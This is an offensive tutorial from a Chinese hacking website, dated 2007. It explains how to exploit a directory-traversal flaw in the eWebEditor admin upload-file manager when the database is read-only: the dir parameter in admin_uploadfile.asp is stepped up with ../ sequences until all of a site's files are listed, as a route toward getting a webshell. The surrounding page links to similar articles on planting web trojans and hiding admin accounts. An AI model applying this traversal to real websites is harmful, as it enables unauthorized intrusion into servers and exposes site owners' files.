黑客风云——风云网络
设为首页
加入收藏
我要投稿
网站地图
黑客新闻
黑客技术
动画教程
QQ黑客
培训基地
技术论坛
您现在的位置:
黑客风云
>>
黑客文章
>>
黑客入门
>>
电脑新手
>> 文章正文
[推荐]
当Ewebeditor数据库为只读时..
荐
★★★★★
当Ewebeditor数据库为只读时..
文章整理发布:
黑客风云
文章来源:
www.05112.com
更新时间:2007-7-4
版本的ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限. 能看不能动
好在webeditor后台有个小小的缺陷. 可以历遍整个
网站
目录哦. 当然.数据库为只读的时候一样可以利用.
for:
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个
网站
文件了
当然 能不能拿到shell 具体问题具体解决..
文章录入:cainiaowang 责任编辑:cainiaowang
上一篇文章:
各种网页木马挂马的代码
下一篇文章: 没有了
【字体:
小
大
】【
发表评论
】【
加入收藏
】【
告诉好友
】【
打印此文
】【
关闭窗口
】
VIP 专 区
抽根憋闷烟的心声
学习网页制作的理由
加入终身会员的理由!!!
学习黑客编程的5大理由
学习免杀的6大理由
学习软件破解的理由
会员账号开通查询
常见问题解答
汇款向导
学员报名咨询
最 新 热 门
各种网页木马挂马的代码
07-04
简单打造不死鸽子
07-02
走进神秘的社会工程学
07-02
建立系统中别人永远删不掉的管理
06-29
入侵搜索关键字
06-19
phpwind、DZ论坛XSS跨站漏洞0DAY
06-15
如何提高提权效率
06-14
隐藏管理员账号三分钟搞定
05-30
5分钟激活Vista 免刷BIOS方法揭秘
05-18
最新挂马的方法大全
05-17
数据库下载漏洞
05-16
最经典的黑客入门教材!
05-14
相 关 文 章
数据库下载漏洞
数据库恢复实战
MySQL数据库安全配置指南
获得数据库服务器的IP地址
注射DB_ONER权限并且主机与数据库不一起
pubwinEP如何防止远程修改数据库
如何恢复/修复MS SQL数据库的MDF文件
数据库连接池的原理机制
如何恢复/修复MS SQL数据库的MDF文件
入侵oracle数据库时常用的操作命令
通过HttpModule实现数据库防注入
使用ASP下载SQL数据库
Copyright @2006 黑客风云 ●业务联系:QQ
联系怪人
联系奇人
Email:
给怪人发邮件
给奇人发邮件
ICP备案:冀06009886
站长统计..